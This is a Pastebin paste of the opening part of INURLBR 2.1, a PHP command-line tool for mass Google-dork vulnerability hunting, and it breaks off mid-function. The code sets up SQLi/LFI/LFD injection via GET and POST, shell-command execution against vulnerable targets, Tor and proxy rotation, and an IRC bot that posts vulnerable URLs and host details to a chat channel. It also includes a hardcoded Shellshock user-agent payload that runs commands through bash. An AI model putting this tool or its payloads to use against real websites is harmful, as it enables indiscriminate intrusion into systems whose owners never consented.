_c0mrad

[MASS] INURLBR.php

Oct 24th, 2016
421
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 212.97 KB | None | 0 0
  1. #!/usr/bin/php -q
  2. <?php
  3. /*
  4.  
  5.   +-----------------------------------------------------------------------------+
  6.   |  [!] Legal disclaimer: Usage of INURLBR for attacking targets without prior |
  7.   |  mutual consent is illegal.                                                 |
  8.   |  It is the end user's responsibility to obey all applicable local, state and|
  9.   |  federal laws.                                                              |
  10.   |  Developers assume no liability and are not responsible for any misuse or   |
  11.   |  damage caused by this program                                              |
  12.   +-----------------------------------------------------------------------------+
  13.  
  14.  
  15.   [+] AUTOR:        googleINURL
  16.   [+] Blog:         http://blog.inurl.com.br
  17.   [+] Twitter:      https://twitter.com/googleinurl
  18.   [+] Fanpage:      https://fb.com/InurlBrasil
  19.   [+] Pastebin      http://pastebin.com/u/Googleinurl
  20.   [+] GIT:          https://github.com/googleinurl
  21.   [+] PSS:          http://packetstormsecurity.com/user/googleinurl
  22.   [+] YOUTUBE:      http://youtube.com/c/INURLBrasil
  23.   [+] PLUS:         http://google.com/+INURLBrasil
  24.  
  25.   [+] SCRIPT NAME: INURLBR 2.1
  26.   INURLBR scanner was developed by Cleiton Pinheiro, owner and founder of INURL - BRASIL.
  27.   Tool made ​​in PHP that can run on different Linux distributions helps
  28.   hackers / security professionals in their specific searches.
  29.   With several options are automated methods of exploration, AND SCANNER is
  30.   known for its ease of use and performasse.
  31.   The inspiration to create the inurlbr scanner, was the XROOT Scan 5.2 application.
  32.  
  33.   [+]  Long desription
  34.   The INURLBR tool was developed aiming to meet the need of Hacking community.
  35.   Purpose: Make advanced searches to find potential vulnerabilities in web
  36.   applications known as Google Hacking with various options and search filters,
  37.   this tool has an absurd power of search engines available with
  38.   (24) + 6 engines special(deep web)
  39.  
  40.   - Possibility generate IP ranges or random_ip and analyze their targets.
  41.   - Customization of  HTTP-HEADER, USER-AGET, URL-REFERENCE.
  42.   - Execution external to exploit certain targets.
  43.   - Generator dorks random or set file dork.
  44.   - Option to set proxy, file proxy list, http proxy, file http proxy.
  45.   - Set time random proxy.
  46.   - It is possible to use TOR ip Random.
  47.   - Debug processes urls, http request, process irc.
  48.   - Server communication irc sending vulns urls for chat room.
  49.   - Possibility injection exploit GET / POST => SQLI, LFI, LFD.
  50.   - Filter and validation based regular expression.
  51.   - Extraction of email and url.
  52.   - Validation using http-code.
  53.   - Search pages based on strings file.
  54.   - Exploits commands manager.
  55.   - Paging limiter on search engines.
  56.   - Beep sound when trigger vulnerability note.
  57.   - Use text file as a data source for urls tests.
  58.   - Find personalized strings in return values of the tests.
  59.   - Validation vulnerability shellshock.
  60.   - File validation values wordpress wp-config.php.
  61.   - Execution sub validation processes.
  62.   - Validation syntax errors database and programmin.
  63.   - Data encryption as native parameter.
  64.   - Random google host.
  65.   - Scan port.
  66.   - Error Checking & values​​:
  67.   [*]JAVA INFINITYDB, [*]LOCAL FILE INCLUSION, [*]ZIMBRA MAIL,           [*]ZEND FRAMEWORK,
  68.   [*]ERROR MARIADB,   [*]ERROR MYSQL,          [*]ERROR JBOSSWEB,        [*]ERROR MICROSOFT,
  69.   [*]ERROR ODBC,      [*]ERROR POSTGRESQL,     [*]ERROR JAVA INFINITYDB, [*]ERROR PHP,
  70.   [*]CMS WORDPRESS,   [*]SHELL WEB,            [*]ERROR JDBC,            [*]ERROR ASP,
  71.   [*]ERROR ORACLE,    [*]ERROR DB2,            [*]JDBC CFM,              [*]ERROS LUA,
  72.   [*]ERROR INDEFINITE
  73.  
  74.   [+] Dependencies - (PHP 5.4.*):
  75.   sudo apt-get install curl libcurl3 libcurl3-dev php5 php5-cli php5-curl
  76.  
  77.  
  78.   [+] Play LIST TUTORIAL:
  79.   https://www.youtube.com/watch?v=jwjZUsgf9xM&list=PLV1376pVwcCmcoCmq_Z4O0ra4BqjmhIaR
  80.  
  81.  
  82.   +--------------------------------------------------------------------------------------+
  83.   |  |  |                            G R 3 3 T S                                   |  |  |
  84.   +--------------------------------------------------------------------------------------+
  85.  * r00t-3xp10t, Jh00n, chk_,  Unknownantisec,  sl4y3r 0wn3r, hc0d3r, arplhmd, 0x4h4x
  86.  * Clandestine, KoubackTr, SnakeTomahawk, SkyRedFild, Lorenzo Faletra, Eclipse, shaxer  
  87.  * dd3str0y3r, Johnny Deep, Lenon Leite, pSico_b0y, Bakunim_Malvadão, IceKiller, c00z  
  88.  * Oystex, rH, Warflop, se4b3ar
  89.  
  90.  */
  91.  
  92. error_reporting(0);
  93. set_time_limit(0);
  94. ini_set('memory_limit', '256M');
  95. ini_set('display_errors', 0);
  96. ini_set('max_execution_time', 0);
  97. ini_set('allow_url_fopen', 1);
  98. (!isset($_SESSION) ? session_start() : NULL);
  99. __OS();
  100.  
  101.  
  102. /*
  103.   [+]Capturing TERMINAL VALUES.
  104.   (PHP 4 >= 4.3.0, PHP 5)getopt - Gets options from the command line argument list
  105.   http://php.net/manual/pt_BR/function.getopt.php */
  106. $commandos_list = array(
  107.     'dork:', 'dork-file:', 'exploit-cad:', 'range:', 'range-rand:', 'irc:',
  108.     'exploit-all-id:', 'exploit-vul-id:', 'exploit-get:', 'exploit-post:',
  109.     'regexp-filter:', 'exploit-command:', 'command-all:', 'command-vul:',
  110.     'replace:', 'remove:', 'regexp:', 'sall:', 'sub-file:', 'sub-get::', 'sub-concat:',
  111.     'user-agent:', 'url-reference:', 'delay:', 'sendmail:', 'time-out:',
  112.     'http-header:', 'ifcode:', 'ifurl:', 'ifemail:', 'mp:', 'target:',
  113.     'no-banner::', 'gc::', 'proxy:', 'proxy-file:', 'time-proxy:', 'pr::',
  114.     'proxy-http-file:', 'update::', 'info::', 'help::', 'unique::', 'popup::',
  115.     'ajuda::', 'install-dependence::', 'cms-check::', 'sub-post::', 'robots::',
  116.     'alexa-rank::', 'beep::', 'exploit-list::', 'tor-random::', 'shellshock::',
  117.     'dork-rand:', 'sub-cmd-all:', 'sub-cmd-vul:', 'port-cmd:', 'port-scan:',
  118.     'port-write:', 'ifredirect:', 'persist:', 'file-cookie:', 'save-as:'
  119. );
  120.  
  121. $opcoes = getopt('u::a:d:o:p:s:q:t:m::h::', $commandos_list);
  122.  
  123.  
  124. /*
  125.   [+]VERIFYING LIB php5-curl IS INSTALLED.
  126.   (PHP 4, PHP 5) function_exists — Return TRUE if the given function has been
  127.   defined.
  128.   http://php.net/manual/en/function.function-exists.php
  129.  
  130.   [+]Verification - CURL_EXEC
  131.   Execute the given cURL session.
  132.   This function should be called after initializing a cURL session and all the
  133.   options for the session are set.
  134.   http://php.net/manual/en/function.curl-exec.php */
  135. (!function_exists('curl_exec') ? __getOut(__bannerLogo() . "{$_SESSION["c1"]}[ INFO ]{$_SESSION["c0"]}{$_SESSION["c2"]} INSTALLING THE LIBRARY php5-curl ex: php5-curl apt-get install{$_SESSION["c0"]}\n") : NULL );
  136.  
  137. /*
  138.   [+]VERIFYING use Input PHP CLI.
  139.   (PHP 4, PHP 5) defined — Checks whether a given named constant exists
  140.   http://php.net/manual/pt_BR/function.defined.php */
  141. (!defined('STDIN') ? __getOut(__bannerLogo() . "{$_SESSION["c1"]}[ INFO ]{$_SESSION["c0"]}{$_SESSION["c2"]} Please run it through command-line!{$_SESSION["c0"]}\n") : NULL);
  142.  
  143.  
  144. #[+]Resetting VALUES $ _SESSION ['config']
  145. $_SESSION['config'] = array();
  146. $_SESSION['config']['version_script'] = '2.1';
  147. $_SESSION['config']['totas_urls'] = NULL;
  148. $_SESSION['config']["contUrl"] = 0;
  149. $_SESSION['config']['cont_email'] = 0;
  150. $_SESSION['config']['cont_url'] = 0;
  151. $_SESSION['config']['cont_valores'] = 0;
  152.  
  153. #[+] FILE MANAGEMENT EXPLOITS.
  154. $_SESSION['config']['file_exploit_conf'] = 'exploits.conf';
  155.  
  156. #[+] FOLDER WHERE WILL BE SAVED PROCESSES.
  157. $_SESSION['config']['out_put_paste'] = 'output/';
  158.  
  159. /*
  160.   [+]USER-AGENT EXPLOIT SHELLSHOCK
  161.   (CVE-2014-6271, CVE-2014-6277,
  162.   CVE-2014-6278, CVE-2014-7169,
  163.   CVE-2014-7186, CVE-2014-7187)
  164.   is a vulnerability in GNU's bash shell that gives attackers access to run remote
  165.   commands on a vulnerable system. */
  166. $_SESSION['config']['user_agent_xpl'] = "() { foo;};echo; /bin/bash -c \"expr 299663299665 / 3; echo CMD:;id; echo END_CMD:;\"";
  167.  
  168. #[+]BLACK LIST URL-STRINGS
  169. $_SESSION['config']['blacklist'] = "//t.co,google.,youtube.,jsuol.com,.radio.uol.,b.uol.,barra.uol.,whowhere.,hotbot.,amesville.,lycos,lygo.,orkut.,schema.,blogger.,bing.,w3.,yahoo.,yimg.,creativecommons.org,ndj6p3asftxboa7j.,.torproject.org,.lygo.com,.apache.org,.hostname.,document.,";
  170. $_SESSION['config']['blacklist'].= "live.,microsoft.,ask.,shifen.com,answers.,analytics.,googleadservices.,sapo.pt,favicon.,blogspot.,wordpress.,.css,scripts.js,jquery-1.,dmoz.,gigablast.,aol.,.macromedia.com,.sitepoint.,yandex.,www.tor2web.org,.securityfocus.com,.Bootstrap.,.metasploit.com,";
  171. $_SESSION['config']['blacklist'].= "aolcdn.,altavista.,clusty.,teoma.,baiducontent.com,wisenut.,a9.,uolhost.,w3schools.,msn.,baidu.,hao123.,shifen.,procog.,facebook.,twitter.,flickr.,.adobe.com,oficinadanet.,elephantjmjqepsw.,.shodan.io,kbhpodhnfxl3clb4,.scanalert.com,.prototype.,feedback.core,";
  172. $_SESSION['config']['blacklist'].= "4shared.,.KeyCodeTab,.style.,www/cache/i1,.className.,=n.,a.Ke=,Y.config,.goodsearch.com,style.top,n.Img,n.canvas.,t.search,Y.Search.,a.href,a.currentStyle,a.style,yastatic.,.oth.net,.hotbot.com,.zhongsou.com,ezilon.com,.example.com,location.href,.navigation.,";
  173. $_SESSION['config']['blacklist'].= ".bingj.com,Y.Mobile.,srpcache?p,stackoverflow.,shifen.,baidu.,baiducontent.,gstatic.,php.net,wikipedia.,webcache.,inurl.,naver.,navercorp.,windows.,window.,.devmedia,imasters.,.inspcloud.com,.lycos.com,.scorecardresearch.com,.target.,JQuery.min,Element.location.,";
  174. $_SESSION['config']['blacklist'].= "exploit-db,packetstormsecurity.,1337day,owasp,.sun.com,mobile10.dtd,onabort=function,inurl.com.br,purl.org,.dartsearch.net,r.cb,.classList.,.pt_BR.,github,microsofttranslator.com,.compete.com,.sogou.com,gmail.,blackle.com,boorow.com,gravatar.com,sourceforge.,.mozilla.org";
  175.  
  176. $_SESSION['config']['line'] = "\n{$_SESSION["c1"]} _[ - ]{$_SESSION["c7"]}::{$_SESSION["c1"]}--------------------------------------------------------------------------------------------------------------{$_SESSION["c0"]}";
  177.  
  178. #[+]PRINTING HELP / INFO
  179. (isset($opcoes['h']) || isset($opcoes['help']) || isset($opcoes['ajuda']) ? __menu() : NULL);
  180. (isset($opcoes['info']) ? __info() : NULL);
  181.  
  182. #[+]PRINTING EXPLOITS LIST.
  183. (isset($opcoes['exploit-list']) ? print(__bannerLogo()) . __configExploitsList(1)  : NULL);
  184.  
  185. #[+]CREATING DEFAULT SETTINGS EXIT RESULTS.
  186. (!is_dir($_SESSION['config']['out_put_paste']) ? mkdir($_SESSION['config']['out_put_paste'], 0777, TRUE) : NULL);
  187.  
  188. #[+]CREATING DEFAULT SETTINGS MANAGEMENT EXPLOITS.
  189. (!file_exists($_SESSION['config']['file_exploit_conf']) ? touch($_SESSION['config']['file_exploit_conf']) : NULL);
  190.  
  191. #[+]Deletes FILE cookie STANDARD.
  192. (file_exists('cookie.txt') ? unlink('cookie.txt') : NULL);
  193.  
  194. #[+]REGISTRATION NEW COMMAND EXPLOIT
  195. (not_isnull_empty($opcoes['exploit-cad']) ? __configExploitsADD($opcoes['exploit-cad']) : NULL);
  196.  
  197. #[+]Dependencies installation
  198. (isset($opcoes['install-dependence']) ? __installDepencia() : NULL);
  199.  
  200. #[+]UPDATE SCRIPT
  201. (isset($opcoes['update']) ? __update() : NULL);
  202.  
  203. ################################################################################
  204. #CAPTURE OPTIONS################################################################
  205. ################################################################################
  206. #[+]VALIDATION SEARCH METHODS / (DORK,RANGE-IP)
  207. if (not_isnull_empty($opcoes['o'])) {
  208.  
  209.     $_SESSION['config']['abrir-arquivo'] = $opcoes['o'];
  210. } else if (!not_isnull_empty($opcoes['o']) &&
  211.         !not_isnull_empty($opcoes['range']) &&
  212.         !not_isnull_empty($opcoes['range-rand']) &&
  213.         !not_isnull_empty($opcoes['dork-rand'])) {
  214.  
  215.     $_SESSION['config']['dork'] = not_isnull_empty($opcoes['dork']) && is_null($_SESSION['config']['abrir-arquivo']) ? $opcoes['dork'] : NULL;
  216.     $_SESSION['config']['dork-file'] = not_isnull_empty($opcoes['dork-file']) && is_null($_SESSION['config']['abrir-arquivo']) ? $opcoes['dork-file'] : NULL;
  217.     (!not_isnull_empty($_SESSION['config']['dork']) && !not_isnull_empty($_SESSION['config']['dork-file']) ? __getOut(__bannerLogo() . "{$_SESSION["c1"]}[ INFO ]{$_SESSION["c0"]}{$_SESSION["c2"]}DEFINE DORK ex: --dork '.asp?CategoryID=' OR --dork-file 'dorks.txt'{$_SESSION["c0"]}\n") : NULL);
  218. }
  219.  
  220. #[+]VALIDATION GENERATE DORKS RANDOM
  221. $_SESSION['config']['dork-rand'] = not_isnull_empty($opcoes['dork-rand']) ? $opcoes['dork-rand'] : NULL;
  222.  
  223. #[+]VALIDATION TARGET FIND PAGE
  224. $_SESSION['config']['target'] = not_isnull_empty($opcoes['target']) && !isset($_SESSION['config']['dork']) ? $opcoes['target'] : NULL;
  225.  
  226. #[+]VALIDATION URL EXTRACTION
  227. $_SESSION['config']['extrai-url'] = isset($opcoes['u']) ? TRUE : NULL;
  228.  
  229. #[+]VALIDATION EMAIL EXTRACTION
  230. $_SESSION['config']['extrai-email'] = isset($opcoes['m']) ? TRUE : NULL;
  231.  
  232. #[+]VALIDATION ID SEARCH ENGINE
  233. $_SESSION['config']['motor'] = not_isnull_empty($opcoes['q']) &&
  234.         __validateOptions('1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,e1,e2,e3,e4,e5,e6,all', $opcoes['q']) ? $opcoes['q'] : 1;
  235.  
  236. #[+]VALIDATION SAVE FILE VULNERABLE
  237. !not_isnull_empty($opcoes['s']) && !not_isnull_empty($opcoes['save-as']) && empty($opcoes['sall']) ?
  238.                 __getOut(__bannerLogo() . "{$_SESSION["c1"]}[ INFO ]{$_SESSION["c0"]}{$_SESSION["c2"]}DEFINE FILE SAVE OUTPUT ex: -s , --save-as , --sall filevull.txt{$_SESSION["c0"]}\n") : NULL;
  239.  
  240. $_SESSION['config']['s'] = not_isnull_empty($opcoes['s']) ? $opcoes['s'] : null;
  241.  
  242. $_SESSION['config']['save-as'] = not_isnull_empty($opcoes['save-as']) ? $opcoes['save-as'] : null;
  243.  
  244. $_SESSION['config']['arquivo_output'] = not_isnull_empty($_SESSION['config']['s']) ? $_SESSION['config']['s'] : $opcoes['save-as'];
  245.  
  246. #[+]VALIDATION SAVE FILE ALL VALORES
  247. $_SESSION['config']['arquivo_output_all'] = not_isnull_empty($opcoes['sall']) ? $opcoes['sall'] : NULL;
  248.  
  249. #[+]VALIDATION TYPE ERROR
  250. $_SESSION['config']['tipoerro'] = not_isnull_empty($opcoes['t']) && __validateOptions('1,2,3,4,5', $opcoes['t']) ? $opcoes['t'] : 1;
  251.  
  252. #[+]VALIDATION REPLACEMENT VALUES
  253. $_SESSION['config']['replace'] = not_isnull_empty($opcoes['replace']) ? $opcoes['replace'] : NULL;
  254.  
  255. #[+]VALIDATION SET PROXY
  256. $_SESSION['config']['proxy'] = not_isnull_empty($opcoes['proxy']) ? $opcoes['proxy'] : NULL;
  257.  
  258. #[+]VALIDATION SET FILE WITH LIST OF PROXY
  259. $_SESSION['config']['proxy-file'] = not_isnull_empty($opcoes['proxy-file']) ? $opcoes['proxy-file'] : NULL;
  260.  
  261. #[+]VALIDATION SET HTTP->PROXY
  262. $_SESSION['config']['proxy-http'] = not_isnull_empty($opcoes['proxy-http']) ? $opcoes['proxy-http'] : NULL;
  263.  
  264. #[+]VALIDATION SET FILE WITH LIST OF HTTP->PROXY
  265. $_SESSION['config']['proxy-http-file'] = not_isnull_empty($opcoes['proxy-http-file']) ? $opcoes['proxy-http-file'] : NULL;
  266.  
  267. #[+]VALIDATION SET EXPLOIT VIA REQUEST GET
  268. $_SESSION['config']['exploit-get'] = not_isnull_empty($opcoes['exploit-get']) ? str_replace(' ', '%20', $opcoes['exploit-get']) : NULL;
  269.  
  270. #[+]VALIDATION SET EXPLOIT VIA REQUEST POST
  271. $_SESSION['config']['exploit-post'] = not_isnull_empty($opcoes['exploit-post']) ? __convertUrlQuery($opcoes['exploit-post']) : NULL;
  272. $_SESSION['config']['exploit-post_str'] = not_isnull_empty($opcoes['exploit-post']) ? $opcoes['exploit-post'] : NULL;
  273.  
  274. #[+]VALIDATION COMMAND SHELL STRING COMPLEMENTARY
  275. $_SESSION['config']['exploit-command'] = not_isnull_empty($opcoes['exploit-command']) ? $opcoes['exploit-command'] : NULL;
  276.  
  277. #[+]VALIDATION MANAGEMENT COMMANDS SHELL TARGET VULN ID
  278. $_SESSION['config']['exploit-vul-id'] = not_isnull_empty($opcoes['exploit-vul-id']) ? $opcoes['exploit-vul-id'] : NULL;
  279.  
  280. #[+]VALIDATION MANAGEMENT COMMANDS SHELL ALL TARGET ID
  281. $_SESSION['config']['exploit-all-id'] = not_isnull_empty($opcoes['exploit-all-id']) ? $opcoes['exploit-all-id'] : NULL;
  282.  
  283. #[+]VALIDATION SET COMMANDS SHELL EXECUTE TARGET VULN
  284. $_SESSION['config']['command-vul'] = not_isnull_empty($opcoes['command-vul']) ? $opcoes['command-vul'] : NULL;
  285.  
  286. #[+]VALIDATION SET COMMANDS SHELL EXECUTE ALL TARGET
  287. $_SESSION['config']['command-all'] = not_isnull_empty($opcoes['command-all']) ? $opcoes['command-all'] : NULL;
  288.  
  289. #[+]VALIDATION ADDITIONAL TYPE OF PARAMETER ERROR
  290. $_SESSION['config']['achar'] = not_isnull_empty($opcoes['a']) ? $opcoes['a'] : NULL;
  291.  
  292. #[+]VALIDATION DEBUG NIVEL
  293. $_SESSION['config']['debug'] = not_isnull_empty($opcoes['d']) && __validateOptions('1,2,3,4,5,6', $opcoes['d']) ? $opcoes['d'] : NULL;
  294.  
  295. #[+]VALIDATION INTERNAL
  296. $_SESSION['config']['verifica_info'] = (__validateOptions($opcoes['d'], 6)) ? 1 : NULL;
  297.  
  298. #[+]VALIDATION ADDITIONAL PARAMETER PROXY
  299. $_SESSION['config']['tor-random'] = isset($opcoes['tor-random']) && !is_null($_SESSION["config"]["proxy"]) ? TRUE : NULL;
  300.  
  301. #[+]VALIDATION CHECK VALUES CMS
  302. $_SESSION['config']['cms-check'] = isset($opcoes['cms-check']) ? TRUE : NULL;
  303.  
  304. #[+]VALIDATION CHECK LINKS WEBCACHE GOOGLE
  305. $_SESSION['config']['webcache'] = isset($opcoes['gc']) ? TRUE : NULL;
  306.  
  307. #[+]VALIDATION REGULAR EXPRESSION
  308. $_SESSION['config']['regexp'] = not_isnull_empty($opcoes['regexp']) ? $opcoes['regexp'] : NULL;
  309.  
  310. #[+]VALIDATION FILTER BY REGULAR EXPRESSION
  311. $_SESSION['config']['regexp-filter'] = not_isnull_empty($opcoes['regexp-filter']) ? $opcoes['regexp-filter'] : NULL;
  312.  
  313. #[+]VALIDATION NO BANNER SCRIPT
  314. $_SESSION['config']['no-banner'] = isset($opcoes['no-banner']) ? TRUE : NULL;
  315.  
  316. #[+]VALIDATION SET USER-AGENT REQUEST
  317. $_SESSION['config']['user-agent'] = not_isnull_empty($opcoes['user-agent']) ? $opcoes['user-agent'] : NULL;
  318.  
  319. #[+]VALIDATION SET URL-REFERENCE REQUEST
  320. $_SESSION['config']['url-reference'] = not_isnull_empty($opcoes['url-reference']) ? $opcoes['url-reference'] : NULL;
  321.  
  322. #[+]VALIDATION PAGING THE MAXIMUM SEARCH ENGINE
  323. $_SESSION['config']['max_pag'] = not_isnull_empty($opcoes['mp']) ? $opcoes['mp'] : NULL;
  324.  
  325. #[+]VALIDATION DELAY SET PAGING AND PROCESSES
  326. $_SESSION['config']['delay'] = not_isnull_empty($opcoes['delay']) ? $opcoes['delay'] : NULL;
  327.  
  328. #[+]VALIDATION SET TIME OUT REQUEST
  329. $_SESSION['config']['time-out'] = not_isnull_empty($opcoes['time-out']) ? $opcoes['time-out'] : NULL;
  330.  
  331. #[+]VALIDATION CODE HTTP
  332. $_SESSION['config']['ifcode'] = not_isnull_empty($opcoes['ifcode']) ? $opcoes['ifcode'] : NULL;
  333.  
  334. #[+]VALIDATION STRING URL
  335. $_SESSION['config']['ifurl'] = not_isnull_empty($opcoes['ifurl']) ? $opcoes['ifurl'] : NULL;
  336.  
  337. #[+]VALIDATION SET HTTP HEADER
  338. $_SESSION['config']['http-header'] = not_isnull_empty($opcoes['http-header']) ? $opcoes['http-header'] : NULL;
  339.  
  340. #[+]VALIDATION SET FILE SUB_PROCESS
  341. $_SESSION['config']['sub-file'] = not_isnull_empty($opcoes['sub-file']) ? __openFile($opcoes['sub-file'], 1) : NULL;
  342.  
  343. #[+]VALIDATION SUB_PROCESS TYPE REQUEST POST
  344. $_SESSION['config']['sub-post'] = isset($opcoes['sub-post']) ? TRUE : NULL;
  345.  
  346. #[+]VALIDATION SUB_PROCESS TYPE REQUEST GET
  347. $_SESSION['config']['sub-get'] = isset($opcoes['sub-get']) ? TRUE : NULL;
  348.  
  349. #[+]VALIDATION SEND VULN EMAIL
  350. $_SESSION['config']['sendmail'] = not_isnull_empty($opcoes['sendmail']) ? $opcoes['sendmail'] : NULL;
  351.  
  352. #[+]VALIDATION SHOW RANK ALEXA
  353. $_SESSION['config']['alexa-rank'] = isset($opcoes['alexa-rank']) ? TRUE : NULL;
  354.  
  355. #[+]VALIDATION ACTIVATE BEEP WHEN APPEAR VULNERABLE
  356. $_SESSION['config']['beep'] = isset($opcoes['beep']) ? TRUE : NULL;
  357.  
  358. #[+]VALIDATION OF SINGLE DOMAIN FILTER
  359. $_SESSION['config']['unique'] = isset($opcoes['unique']) ? TRUE : NULL;
  360.  
  361. #[+]VALIDATION IRC SERVER/CHANNEL SEND VULN
  362. $_SESSION['config']['irc']['conf'] = not_isnull_empty($opcoes['irc']) && strstr($opcoes['irc'], '#') ? explode("#", $opcoes['irc']) : NULL;
  363.  
  364. #[+]VALIDATION RANGE IP
  365. $_SESSION['config']['range'] = not_isnull_empty($opcoes['range']) && strstr($opcoes['range'], ',') ? $opcoes['range'] : NULL;
  366.  
  367. #[+]VALIDATION QUANTITY RANGE IP RANDOM
  368. $_SESSION['config']['range-rand'] = not_isnull_empty($opcoes['range-rand']) ? $opcoes['range-rand'] : NULL;
  369.  
  370. #[+]VALIDATION REMOVE STRING URL
  371. $_SESSION['config']['remove'] = not_isnull_empty($opcoes['remove']) ? $opcoes['remove'] : NULL;
  372.  
  373. #[+]VALIDATION ACCESS FILE ROBOTS
  374. $_SESSION['config']['robots'] = isset($opcoes['robots']) ? TRUE : NULL;
  375.  
  376. #[+]VALIDATION FILTER EMAIL STRING
  377. $_SESSION['config']['ifemail'] = not_isnull_empty($opcoes['ifemail']) ? $opcoes['ifemail'] : NULL;
  378.  
  379. #[+]VALIDATION OPEN WINDOW CONSOLE PROCESS
  380. $_SESSION['config']['popup'] = isset($opcoes['popup']) ? TRUE : NULL;
  381.  
  382. #[+]VALIDATION ACTIVATE SHELLSHOCK
  383. $_SESSION['config']['shellshock'] = isset($opcoes['shellshock']) ? TRUE : NULL;
  384.  
  385. #[+]VALIDATION METHOD OF BUSTA PROGRESSIVE
  386. $_SESSION['config']['pr'] = isset($opcoes['pr']) ? TRUE : NULL;
  387.  
  388. #[+]VALIDATION SET SUB-COMMANDS SHELL EXECUTE ALL TARGET
  389. $_SESSION['config']['sub-cmd-all'] = isset($opcoes['sub-cmd-all']) ? TRUE : NULL;
  390.  
  391. #[+]VALIDATION SET SUB-COMMANDS SHELL EXECUTE TARGET VULN
  392. $_SESSION['config']['sub-cmd-vul'] = isset($opcoes['sub-cmd-vul']) ? TRUE : NULL;
  393.  
  394. #[+]VALIDATION SET POR VALIDATION
  395. $_SESSION['config']['port-cmd'] = not_isnull_empty($opcoes['port-cmd']) ? $opcoes['port-cmd'] : NULL;
  396.  
  397. #[+]VALIDATION SET SCAN PORT
  398. $_SESSION['config']['port-scan'] = not_isnull_empty($opcoes['port-scan']) ? $opcoes['port-scan'] : NULL;
  399.  
  400. #[+]VALIDATION SET PAYLOAD XPL PORT
  401. $_SESSION['config']['port-write'] = not_isnull_empty($opcoes['port-write']) ? $opcoes['port-write'] : NULL;
  402.  
  403. #[+]VALIDATION SET URL REDIRECT HEADER
  404. $_SESSION['config']['ifredirect'] = not_isnull_empty($opcoes['ifredirect']) ? $opcoes['ifredirect'] : NULL;
  405.  
  406. #[+]VALIDATION SET URL REDIRECT HEADER
  407. $_SESSION['config']['persist'] = not_isnull_empty($opcoes['persist']) ? $opcoes['persist'] : 4;
  408.  
  409. #[+]VALIDATION SET FILE COOKIE
  410. $_SESSION['config']['file-cookie'] = not_isnull_empty($opcoes['file-cookie']) ? $opcoes['file-cookie'] : NULL;
  411.  
  412. #[+]VALIDATION SET STRING CONCAT URL SUB-PROCESS
  413. $_SESSION['config']['sub-concat'] = not_isnull_empty($opcoes['sub-concat']) ? $opcoes['sub-concat'] : NULL;
  414.  
  415. ################################################################################
  416. #IRC CONFIGURATION##############################################################
  417. ################################################################################
  418.  
  419. if (is_array($_SESSION['config']['irc']['conf'])) {
  420.  
  421.     $alph = range("A", "Z");
  422.     $_ = array(0 => rand(0, 10000), 1 => $alph[rand(0, count($alph))]);
  423.     $_SESSION['config']['irc']['my_pid'] = 0;
  424.     $_SESSION['config']['irc']['irc_server'] = $_SESSION['config']['irc']['conf'][0];
  425.     $_SESSION['config']['irc']['irc_channel'] = "#{$_SESSION['config']['irc']['conf'][1]}";
  426.     $_SESSION['config']['irc']['irc_port'] = 6667;
  427.     $_SESSION['config']['irc']['localhost'] = "127.0.0.1 localhost";
  428.     $_SESSION['config']['irc']['irc_nick'] = "[BOT]1nurl{$_[0]}[{$_[1]}]";
  429.     $_SESSION['config']['irc']['irc_realname'] = "B0t_1NURLBR";
  430.     $_SESSION['config']['irc']['irc_quiet'] = "Session Ended";
  431.     global $conf;
  432. } elseif (!is_array($_SESSION['config']['irc']['conf']) && not_isnull_empty($opcoes['irc'])) {
  433.  
  434.     __getOut(__bannerLogo() . "{$_SESSION["c1"]}[ INFO ]{$_SESSION["c0"]}{$_SESSION["c2"]}IRC WRONG FORMAT! ex: --irc 'irc.rizon.net#inurlbrasil' {$_SESSION["c0"]}\n");
  435. }
  436.  
  437. ################################################################################
  438. #IRC CONECTION##################################################################
  439. ################################################################################
  440.  
  441. function __ircConect($conf) {
  442.  
  443.     $fp = fsockopen($conf['irc_server'], $conf['irc_port'], $conf['errno'], $conf['errstr'], 30);
  444.     if (!$fp) {
  445.  
  446.         echo "Error: {$conf['errstr']}({$conf['errno']})\n";
  447.         return NULL;
  448.     }
  449.     $u = php_uname();
  450.     fwrite($fp, "NICK {$conf['irc_nick']}\r\n");
  451.     fwrite($fp, "USER {$conf['irc_nick']} 8 * :{$conf['irc_realname']}\r\n");
  452.     fwrite($fp, "JOIN {$conf['irc_channel']}\r\n");
  453.     fwrite($fp, "PRIVMSG {$conf['irc_channel']} :[ SERVER ] {$u}\r\n");
  454.     return $fp;
  455. }
  456.  
  457. ################################################################################
  458. #IRC SEND MSG###################################################################
  459. ################################################################################
  460.  
  461. function __ircMsg($conf, $msg) {
  462.  
  463.     fwrite($conf['irc_connection'], "PRIVMSG ${conf['irc_channel']} :${msg}\r\n") . sleep(2);
  464.     __plus();
  465. }
  466.  
  467. ################################################################################
  468. #IRC PING PONG##################################################################
  469. ################################################################################
  470.  
  471. function __ircPong($conf) {
  472.  
  473.     while (!feof($conf['irc_connection'])) {
  474.  
  475.         $conf['READ_BUFFER'] = fgets($conf['irc_connection']);
  476.         __plus();
  477.         if (preg_match("/^PING(.+)/", $conf['READ_BUFFER'], $conf['ret'])) {
  478.  
  479.             __debug(array('debug' => "[ PING-PONG ]{$conf['ret'][1]}", 'function' => '__ircPong'), 6) . __plus();
  480.             fwrite($conf['READ_BUFFER'], "PONG {$conf['ret'][1]}\r\n");
  481.             ($_SESSION['config']['debug'] == 6) ?
  482.                             fwrite($conf['irc_connection'], "PRIVMSG ${conf['irc_channel']} :[ PING-PONG ]-> {$conf['ret'][1]}->function:__ircPong\r\n") : NULL;
  483.         }
  484.     }
  485. }
  486.  
  487. ################################################################################
  488. #IRC QUIT#######################################################################
  489. ################################################################################
  490.  
  491. function __ircQuit($conf) {
  492.  
  493.     fwrite($conf['irc_connection'], "QUIT {$conf['irc_quiet']}\r\n") . sleep(2);
  494.     __plus();
  495.     fclose($conf['irc_connection']);
  496. }
  497.  
  498. #END IRC########################################################################
  499. #UPDATE SCRIPT##################################################################
  500. ################################################################################
  501.  
  502. function __update() {
  503.  
  504.     echo __bannerLogo();
  505.  
  506.     echo "{$_SESSION["c1"]}__[ ! ] {$_SESSION["c16"]}WANT TO MAKE UPDATE SCRIPT\n{$_SESSION["c0"]}";
  507.     echo "{$_SESSION["c1"]}__[ ! ] {$_SESSION["c16"]}This can modify the current script\n{$_SESSION["c0"]}";
  508.     echo "{$_SESSION["c1"]}__[ ! ] {$_SESSION["c16"]}ARE YOU SURE ? (y \ n): {$_SESSION["c0"]}";
  509.  
